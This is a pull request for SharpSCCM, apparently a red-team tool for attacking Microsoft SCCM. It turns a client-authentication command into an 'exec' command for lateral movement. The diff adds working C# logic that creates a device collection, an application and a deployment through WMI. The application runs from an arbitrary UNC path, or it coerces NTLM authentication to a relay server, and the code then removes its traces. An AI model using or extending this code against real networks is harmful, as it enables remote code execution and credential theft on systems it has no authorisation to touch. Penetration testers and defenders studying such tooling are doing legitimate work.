### PR TITLE
Added 'exec' command for lateral movement functions

### DIFF
--- a/lib/MgmtPointMessaging.cs
+++ b/lib/MgmtPointMessaging.cs
@@ -167,7 +167,7 @@ namespace SharpSCCM
 
             // Serialize message XML and display to user
             registrationRequest.SerializeMessageBody();
-            Console.WriteLine($"\n[+] Registration Request Body:\n{System.Xml.Linq.XElement.Parse(registrationRequest.Body.ToString())}");
+            //Console.WriteLine($"\n[+] Registration Request Body:\n{System.Xml.Linq.XElement.Parse(registrationRequest.Body.ToString())}");
 
             // Register client and wait for a confirmation with the SMSID
             Console.WriteLine($"[+] Sending HTTP registration request to {registrationRequest.Settings.HostName}:{registrationRequest.Settings.HttpPort}");
@@ -245,8 +245,8 @@ namespace SharpSCCM
             typeof(InventoryReportBody).GetProperty("RawXml").SetValue(ddrMessage.InventoryReport.ReportBody, inventoryReportXml);
 
             // Display XML to user
-            Console.WriteLine($"\n[+] DDR Body:\n{System.Xml.Linq.XElement.Parse(ddrBodyXml)}");
-            Console.WriteLine($"\n[+] Inventory Report Body:\n{System.Xml.Linq.XElement.Parse("<root>" + ddrMessage.InventoryReport.ReportBody.RawXml + "</root>")}\n");
+            //Console.WriteLine($"\n[+] DDR Body:\n{System.Xml.Linq.XElement.Parse(ddrBodyXml)}");
+            //Console.WriteLine($"\n[+] Inventory Report Body:\n{System.Xml.Linq.XElement.Parse("<root>" + ddrMessage.InventoryReport.ReportBody.RawXml + "</root>")}\n");
 
             // Assemble message and send
             ddrMessage.Settings.Compression = MessageCompression.Zlib;
@@ -254,7 +254,7 @@ namespace SharpSCCM
             ddrMessage.Settings.HostName = managementPoint;
             Console.WriteLine($"[+] Sending DDR from {ddrMessage.SmsId} to {ddrMessage.Settings.Endpoint} endpoint on {ddrMessage.Settings.HostName}:{ddrMessage.SiteCode} and requesting client installation on {target}");
             ddrMessage.SendMessage(sender);
+            Console.WriteLine("[+] Done!");
         }
-
     }
 }

--- a/lib/MgmtPointWmi.cs
+++ b/lib/MgmtPointWmi.cs
@@ -137,37 +137,48 @@ namespace SharpSCCM
                 }
             }
         }
-        public static void InvokeClientAuth (ManagementScope scope, string deviceName = null, string collectionName = null, string relayServer = null, bool runAsUser = true)
+        public static void Exec (ManagementScope scope, string deviceName = null, string collectionName = null, string path = null, string relayServer = null, bool runAsUser = true)
         {
             if ((String.IsNullOrEmpty(deviceName) && String.IsNullOrEmpty(collectionName)) || (!String.IsNullOrEmpty(deviceName) && !String.IsNullOrEmpty(collectionName)))
             {
                 Console.WriteLine("[!] You must specify either a device or existing collection.");
             }
+            else if (!String.IsNullOrEmpty(relayServer) && !String.IsNullOrEmpty(path) || (String.IsNullOrEmpty(relayServer) && String.IsNullOrEmpty(path)))
+            {
+                Console.WriteLine("[!] Please specify either a path or a relay server, but not both.");
+            }
             else
             {
                 if (!String.IsNullOrEmpty(deviceName))
                 {
-                        string newCollectionName = $"Devices_{Guid.NewGuid().ToString()}";
-                        string newApplicationName = $"Application_{Guid.NewGuid().ToString()}";
-                        NewCollection(scope, "device", newCollectionName);
-                        AddDeviceToCollection(scope, deviceName, newCollectionName);
+                    string newCollectionName = $"Devices_{Guid.NewGuid().ToString()}";
+                    string newApplicationName = $"Application_{Guid.NewGuid().ToString()}";
+                    NewCollection(scope, "device", newCollectionName);
+                    AddDeviceToCollection(scope, deviceName, newCollectionName);
+                    if (!String.IsNullOrEmpty(relayServer))
+                    {
                         NewApplication(scope, newApplicationName, $"\\\\{relayServer}\\C$", runAsUser, true);
-                        NewDeployment(scope, newApplicationName, newCollectionName);
-                        Console.WriteLine("[+] Waiting 30s for new deployment to become available");
-                        System.Threading.Thread.Sleep(30000);
-                        InvokeUpdate(scope, newCollectionName);
-                        Console.WriteLine("[+] Waiting 1m for NTLM authentication");
-                        System.Threading.Thread.Sleep(60000);
-                        Console.WriteLine("[+] Cleaning up");
-                        Cleanup.RemoveDeployment(scope, newApplicationName, newCollectionName);
-                        Cleanup.RemoveApplication(scope, newApplicationName);
-                        Cleanup.RemoveCollection(scope, newCollectionName);
-                        Console.WriteLine("[+] Done!");
+                    }
+                    else
+                    {
+                        NewApplication(scope, newApplicationName, $"\\\\{path}", runAsUser, true);
+                    }
+                    NewDeployment(scope, newApplicationName, newCollectionName);
+                    Console.WriteLine("[+] Waiting 30s for new deployment to become available");
+                    System.Threading.Thread.Sleep(30000);
+                    InvokeUpdate(scope, newCollectionName);
+                    Console.WriteLine("[+] Waiting 1m for NTLM authentication");
+                    System.Threading.Thread.Sleep(60000);
+                    Console.WriteLine("[+] Cleaning up");
+                    Cleanup.RemoveDeployment(scope, newApplicationName, newCollectionName);
+                    Cleanup.RemoveApplication(scope, newApplicationName);
+                    Cleanup.RemoveCollection(scope, newCollectionName);
+                    Console.WriteLine("[+] Done!");
                 }
                 else
                 // If a collection is specified instead of a device
                 {
-
+                    Console.WriteLine("[!] Deploying an application to a collection has not yet been implemented. Try deploying to a single system instead.");
                 }
             }
         }


### PR DESCRIPTION
# Pull Requests

## Requirements

No new requirements

### Description

Changed 'invoke client-auth' to 'exec' and added --path and --relay-server options to execute an application from an arbitrary UNC path or send NTLM auth to a server, respectively.
